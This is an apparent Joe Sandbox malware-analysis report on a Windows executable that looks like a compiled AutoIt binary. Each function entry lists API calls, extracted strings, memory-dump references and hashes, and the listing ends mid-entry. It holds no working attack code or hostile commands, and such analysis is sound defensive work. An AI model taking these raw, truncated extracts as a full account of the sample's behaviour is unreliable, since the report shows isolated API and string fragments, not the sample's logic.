                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: BuffCharMessageSendUpper
                                                                                                                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                  • API String ID: 3974292440-4258414348
                                                                                                                                                  • Opcode ID: 8551f69f223e5bdeac0c783f2c4a73df6d5f98841a83c573d89b7fb24d6da8d4
                                                                                                                                                  • Instruction ID: 284482c989e2c3ea33895925bad2fd62e2b6eb619b8524f2c72ddc2562c3458e
                                                                                                                                                  • Opcode Fuzzy Hash: 8551f69f223e5bdeac0c783f2c4a73df6d5f98841a83c573d89b7fb24d6da8d4
                                                                                                                                                  • Instruction Fuzzy Hash: BF917F712043119BCB04FF11C451A6EB7E1AF95358F44886EF8966B3A3DB38ED0ACB59
                                                                                                                                                  Function 0046A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                                                                                    • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                                                                                  • CharLowerBuffW.USER32(?,?), ref: 0046A3CB
                                                                                                                                                  • GetDriveTypeW.KERNEL32 ref: 0046A418
                                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A460
                                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A497
                                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A4C5
                                                                                                                                                    • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                  • API String ID: 2698844021-4113822522
                                                                                                                                                  • Opcode ID: c9c3f5bcbb85441f6b74d870dff76a731b9fa90bff3ae6885b825ce50aabd4a2
                                                                                                                                                  • Instruction ID: 3713139b98a23bb0435d921a878e050fdb512fde8566727adc807e41ed5eba46
                                                                                                                                                  • Opcode Fuzzy Hash: c9c3f5bcbb85441f6b74d870dff76a731b9fa90bff3ae6885b825ce50aabd4a2
                                                                                                                                                  • Instruction Fuzzy Hash: F7515EB15146049FC700EF11C88196BB7E8EF94718F10886EF89967292DB39ED0ACF5A
                                                                                                                                                  Function 0048C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                                                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0048C1FC
                                                                                                                                                  • GetFocus.USER32 ref: 0048C20C
                                                                                                                                                  • GetDlgCtrlID.USER32(00000000), ref: 0048C217
                                                                                                                                                  • _memset.LIBCMT ref: 0048C342
                                                                                                                                                  • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0048C36D
                                                                                                                                                  • GetMenuItemCount.USER32(?), ref: 0048C38D
                                                                                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 0048C3A0
                                                                                                                                                  • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0048C3D4
                                                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0048C41C
                                                                                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0048C454
                                                                                                                                                  • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0048C489
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                                                  • String ID: 0
                                                                                                                                                  • API String ID: 1296962147-4108050209
                                                                                                                                                  • Opcode ID: def0e58347c4409c250f55c9ee6cbbe1a63305509d680dc30ac648ae6a34dcd3
                                                                                                                                                  • Instruction ID: c475bcefc4ba02209658d373736a3052ec3262963195f5d7aee57ef1aaf8ece4
                                                                                                                                                  • Opcode Fuzzy Hash: def0e58347c4409c250f55c9ee6cbbe1a63305509d680dc30ac648ae6a34dcd3
                                                                                                                                                  • Instruction Fuzzy Hash: 17818870608301AFD710EF24D894A7FBBE8EB88714F004D2EF99597291D778D945CBAA
                                                                                                                                                  Function 0047731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetDC.USER32(00000000), ref: 0047738F
                                                                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0047739B
                                                                                                                                                  • CreateCompatibleDC.GDI32(?), ref: 004773A7
                                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 004773B4
                                                                                                                                                  • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00477408
                                                                                                                                                  • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00477444
                                                                                                                                                  • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00477468
                                                                                                                                                  • SelectObject.GDI32(00000006,?), ref: 00477470
                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00477479
                                                                                                                                                  • DeleteDC.GDI32(00000006), ref: 00477480
                                                                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 0047748B
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                  • String ID: (
                                                                                                                                                  • API String ID: 2598888154-3887548279
                                                                                                                                                  • Opcode ID: 42b41ddd4b113a7f294a88d3ae7bdf7c915cf6e4ce284398e7230c733f28da6c
                                                                                                                                                  • Instruction ID: dfe8a3419fea5eebfe22a8fe4a62b6ec684acb784746aa6277c3acce6f7982dd
                                                                                                                                                  • Opcode Fuzzy Hash: 42b41ddd4b113a7f294a88d3ae7bdf7c915cf6e4ce284398e7230c733f28da6c
                                                                                                                                                  • Instruction Fuzzy Hash: 5D515871904209EFCB14CFA8CC84EAFBBB9EF49310F14852EF959A7211D735A945CB54
                                                                                                                                                  Function 00406A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00420957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00406B0C,?,00008000), ref: 00420973
                                                                                                                                                    • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD
                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00406CFA
                                                                                                                                                    • Part of subcall function 0040586D: _wcscpy.LIBCMT ref: 004058A5
                                                                                                                                                    • Part of subcall function 0042363D: _iswctype.LIBCMT ref: 00423645
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                                                                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                                                  • API String ID: 537147316-1018226102
                                                                                                                                                  • Opcode ID: 4174df05c1f75710156156201a577902b35b21e51bd75112bebbd34d4145220d
                                                                                                                                                  • Instruction ID: 136c1bde332718f4234bbb9892b60201bfb37e26dd96c6a9a3310cb901d73b7e
                                                                                                                                                  • Opcode Fuzzy Hash: 4174df05c1f75710156156201a577902b35b21e51bd75112bebbd34d4145220d
                                                                                                                                                  • Instruction Fuzzy Hash: 2C027D701083419FC714EF25C8419AFBBE5EF98318F54492FF486A72A2DB38D949CB5A
                                                                                                                                                  Function 00462D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 00462D50
                                                                                                                                                  • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00462DDD
                                                                                                                                                  • GetMenuItemCount.USER32(004C5890), ref: 00462E66
                                                                                                                                                  • DeleteMenu.USER32(004C5890,00000005,00000000,000000F5,?,?), ref: 00462EF6
                                                                                                                                                  • DeleteMenu.USER32(004C5890,00000004,00000000), ref: 00462EFE
                                                                                                                                                  • DeleteMenu.USER32(004C5890,00000006,00000000), ref: 00462F06
                                                                                                                                                  • DeleteMenu.USER32(004C5890,00000003,00000000), ref: 00462F0E
                                                                                                                                                  • GetMenuItemCount.USER32(004C5890), ref: 00462F16
                                                                                                                                                  • SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 00462F4C
                                                                                                                                                  • GetCursorPos.USER32(?), ref: 00462F56
                                                                                                                                                  • SetForegroundWindow.USER32(00000000), ref: 00462F5F
                                                                                                                                                  • TrackPopupMenuEx.USER32(004C5890,00000000,?,00000000,00000000,00000000), ref: 00462F72
                                                                                                                                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00462F7E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3993528054-0
                                                                                                                                                  • Opcode ID: 68d6ff921564c39c8709aecc737d134abe6a2587159ab4d14f70d8f79111516a
                                                                                                                                                  • Instruction ID: dec7b0e441c84a99d0ab23afc077d39fee676e6f9a2472c44709d087c22ecc3a
                                                                                                                                                  • Opcode Fuzzy Hash: 68d6ff921564c39c8709aecc737d134abe6a2587159ab4d14f70d8f79111516a
                                                                                                                                                  • Instruction Fuzzy Hash: AB71F670601A05BBEB219F54DD49FAABF64FF04314F10022BF615AA2E1D7FA5C10DB5A
                                                                                                                                                  Function 00AB24FF Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 00AB2543
                                                                                                                                                    • Part of subcall function 00AB3073: _free.LIBCMT ref: 00AB3090
                                                                                                                                                    • Part of subcall function 00AB3073: _free.LIBCMT ref: 00AB30A2
                                                                                                                                                    • Part of subcall function 00AB3073: _free.LIBCMT ref: 00AB30B4
                                                                                                                                                    • Part of subcall function 00AB3073: _free.LIBCMT ref: 00AB30C6
                                                                                                                                                    • Part of subcall function 00AB3073: _free.LIBCMT ref: 00AB30D8
                                                                                                                                                    • Part of subcall function 00AB3073: _free.LIBCMT ref: 00AB30EA
                                                                                                                                                    • Part of subcall function 00AB3073: _free.LIBCMT ref: 00AB30FC
                                                                                                                                                    • Part of subcall function 00AB3073: _free.LIBCMT ref: 00AB310E
                                                                                                                                                    • Part of subcall function 00AB3073: _free.LIBCMT ref: 00AB3120
                                                                                                                                                    • Part of subcall function 00AB3073: _free.LIBCMT ref: 00AB3132
                                                                                                                                                    • Part of subcall function 00AB3073: _free.LIBCMT ref: 00AB3144
                                                                                                                                                    • Part of subcall function 00AB3073: _free.LIBCMT ref: 00AB3156
                                                                                                                                                    • Part of subcall function 00AB3073: _free.LIBCMT ref: 00AB3168
                                                                                                                                                  • _free.LIBCMT ref: 00AB2538
                                                                                                                                                    • Part of subcall function 00AB2096: HeapFree.KERNEL32(00000000,00000000,?,00AB3208,?,00000000,?,00000000,?,00AB322F,?,00000007,?,?,00AB2697,?), ref: 00AB20AC
                                                                                                                                                    • Part of subcall function 00AB2096: GetLastError.KERNEL32(?,?,00AB3208,?,00000000,?,00000000,?,00AB322F,?,00000007,?,?,00AB2697,?,?), ref: 00AB20BE
                                                                                                                                                  • _free.LIBCMT ref: 00AB255A
                                                                                                                                                  • _free.LIBCMT ref: 00AB256F
                                                                                                                                                  • _free.LIBCMT ref: 00AB257A
                                                                                                                                                  • _free.LIBCMT ref: 00AB259C
                                                                                                                                                  • _free.LIBCMT ref: 00AB25AF
                                                                                                                                                  • _free.LIBCMT ref: 00AB25BD
                                                                                                                                                  • _free.LIBCMT ref: 00AB25C8
                                                                                                                                                  • _free.LIBCMT ref: 00AB2600
                                                                                                                                                  • _free.LIBCMT ref: 00AB2607
                                                                                                                                                  • _free.LIBCMT ref: 00AB2624
                                                                                                                                                  • _free.LIBCMT ref: 00AB263C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                                  • Opcode ID: 7f85e9110f571b389ebd9a649353c784751addab696c55771376cebf0ed54765
                                                                                                                                                  • Instruction ID: 0f1eb297560d834ce213920d78c36340422e024e1f466ce7c1e4046b9ba338c5
                                                                                                                                                  • Opcode Fuzzy Hash: 7f85e9110f571b389ebd9a649353c784751addab696c55771376cebf0ed54765
                                                                                                                                                  • Instruction Fuzzy Hash: 47314772A003059BEB31AB38D955BDAB7EDFB04351F10452BE45AD6263EA75AD80CB20
                                                                                                                                                  Function 004788AB Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 004788D7
                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00478904
                                                                                                                                                  • CoUninitialize.OLE32 ref: 0047890E
                                                                                                                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 00478A0E
                                                                                                                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 00478B3B
                                                                                                                                                  • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00492C0C), ref: 00478B6F
                                                                                                                                                  • CoGetObject.OLE32(?,00000000,00492C0C,?), ref: 00478B92
                                                                                                                                                  • SetErrorMode.KERNEL32(00000000), ref: 00478BA5
                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00478C25
                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00478C35
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                                                  • String ID: ,,I
                                                                                                                                                  • API String ID: 2395222682-4163367948
                                                                                                                                                  • Opcode ID: 86113d1df25df9381713289ea4cd204886f45ef52b39823f92184825a9a21490
                                                                                                                                                  • Instruction ID: aabbb54c80bb5556d5779205c7c98f5c8569651e4766cb9ae3be61758569f7e0
                                                                                                                                                  • Opcode Fuzzy Hash: 86113d1df25df9381713289ea4cd204886f45ef52b39823f92184825a9a21490
                                                                                                                                                  • Instruction Fuzzy Hash: 33C138B1604305AFC700DF25C88896BB7E9FF89348F00896EF9899B251DB75ED05CB56
                                                                                                                                                  Function 00480E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: BuffCharUpper
                                                                                                                                                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                  • API String ID: 3964851224-909552448
                                                                                                                                                  • Opcode ID: a4df75a5d1017b7a8f535d2451c159b81df183318fde1907aaf5dc5abb7e2787
                                                                                                                                                  • Instruction ID: 987af29362f030b9785e67816bde092fa47ad23058dcaf1b7a905610e89cab94
                                                                                                                                                  • Opcode Fuzzy Hash: a4df75a5d1017b7a8f535d2451c159b81df183318fde1907aaf5dc5abb7e2787
                                                                                                                                                  • Instruction Fuzzy Hash: 3C4183312142598BCF60FF11D891AEF3760AF21308F94882BFE5517292D77C9D1ACB69
                                                                                                                                                  Function 004652C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                                                                                    • Part of subcall function 00407924: _memmove.LIBCMT ref: 004079AD
                                                                                                                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00465330
                                                                                                                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00465346
                                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00465357
                                                                                                                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00465369
                                                                                                                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0046537A
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: SendString$_memmove
                                                                                                                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                  • API String ID: 2279737902-1007645807
                                                                                                                                                  • Opcode ID: a38f690a41644a1ea6aaaa90d6ed946eea0a1c3052881e4aa48fec53c4da1104
                                                                                                                                                  • Instruction ID: 2e8e5f898991f968bbba2f693440f846553d5b5edaf37d24830f39f112612e90
                                                                                                                                                  • Opcode Fuzzy Hash: a38f690a41644a1ea6aaaa90d6ed946eea0a1c3052881e4aa48fec53c4da1104
                                                                                                                                                  • Instruction Fuzzy Hash: CE119370D5015979D720B662CC49EFF7B7CEB91B48F10042F7801A21D1EDB81D45C6BA
                                                                                                                                                  Function 004646B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                  • String ID: 0.0.0.0
                                                                                                                                                  • API String ID: 208665112-3771769585
                                                                                                                                                  • Opcode ID: 09d15450440633b0f7a2b62d0b119be12e95eec53dc4214b1ac8cb0b212af872
